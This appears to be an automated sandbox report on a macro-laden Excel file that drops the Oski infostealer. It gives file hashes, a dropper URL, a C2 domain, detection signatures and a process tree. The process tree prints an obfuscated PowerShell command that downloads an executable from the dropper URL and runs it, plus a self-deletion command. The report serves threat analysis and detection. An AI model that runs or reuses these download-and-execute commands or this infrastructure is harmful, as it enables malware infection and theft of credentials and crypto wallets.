Analysis

  • max time kernel
    101s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    05/08/2021, 18:27

General

  • Target

    fileattached.xlsm

  • Size

    12KB

  • MD5

    2d827df1ee25674aac2060c37efa2fe7

  • SHA1

    c3c6a82ee16f87ebacdd8be47018be38b6c98a27

  • SHA256

    436651743894169dc9cd4c7ef01734420a5ce2d6dcaf57825197e0c756feeee9

  • SHA512

    93258ac910bcad2633dfaa947edf88b3cfea5bb625b071e005fc7ba117e1307a77a6ddc5a8a7ab14a3cea646d8743dc60e5cdc0271ee8eb467faf2a06d739d66

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://iurl.vip/bij0o

Extracted

Family

oski

C2

notedemo.axfree.com

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\fileattached.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\zJAMC.exe
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1716
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\zJAMC.exe
        3⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1508
        • C:\Users\Admin\AppData\Local\Temp\zJAMC.exe
          "C:\Users\Admin\AppData\Local\Temp\zJAMC.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1000
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            5⤵
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /pid 1976 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe & RD /S /Q C:\\ProgramData\\863405627395110\\* & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1852
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /pid 1976
                7⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1836
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/bij0o',$env:Temp+'\zJAMC.exe')
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:816

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/816-73-0x0000000004A20000-0x0000000004A21000-memory.dmp

          Filesize

          4KB

        • memory/816-64-0x00000000752B1000-0x00000000752B3000-memory.dmp

          Filesize

          8KB

        • memory/816-70-0x0000000004A60000-0x0000000004A61000-memory.dmp

          Filesize

          4KB

        • memory/816-74-0x0000000004A22000-0x0000000004A23000-memory.dmp

          Filesize

          4KB

        • memory/1000-118-0x00000000004E0000-0x00000000004E1000-memory.dmp

          Filesize

          4KB

        • memory/1000-119-0x00000000004A0000-0x00000000004A5000-memory.dmp

          Filesize

          20KB

        • memory/1000-115-0x0000000000B60000-0x0000000000B61000-memory.dmp

          Filesize

          4KB

        • memory/1060-131-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/1060-60-0x0000000070E41000-0x0000000070E43000-memory.dmp

          Filesize

          8KB

        • memory/1060-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/1060-59-0x000000002FE81000-0x000000002FE84000-memory.dmp

          Filesize

          12KB

        • memory/1508-78-0x0000000005240000-0x0000000005241000-memory.dmp

          Filesize

          4KB

        • memory/1508-87-0x0000000005700000-0x0000000005701000-memory.dmp

          Filesize

          4KB

        • memory/1508-72-0x00000000048E0000-0x00000000048E1000-memory.dmp

          Filesize

          4KB

        • memory/1508-75-0x00000000048E2000-0x00000000048E3000-memory.dmp

          Filesize

          4KB

        • memory/1508-103-0x00000000062E0000-0x00000000062E1000-memory.dmp

          Filesize

          4KB

        • memory/1508-82-0x00000000056B0000-0x00000000056B1000-memory.dmp

          Filesize

          4KB

        • memory/1508-108-0x000000007EF30000-0x000000007EF31000-memory.dmp

          Filesize

          4KB

        • memory/1508-95-0x0000000006240000-0x0000000006241000-memory.dmp

          Filesize

          4KB

        • memory/1508-88-0x0000000006170000-0x0000000006171000-memory.dmp

          Filesize

          4KB

        • memory/1508-76-0x0000000002540000-0x0000000002541000-memory.dmp

          Filesize

          4KB

        • memory/1508-68-0x00000000009D0000-0x00000000009D1000-memory.dmp

          Filesize

          4KB

        • memory/1976-123-0x0000000000400000-0x0000000000438000-memory.dmp

          Filesize

          224KB

        • memory/1976-120-0x0000000000400000-0x0000000000438000-memory.dmp

          Filesize

          224KB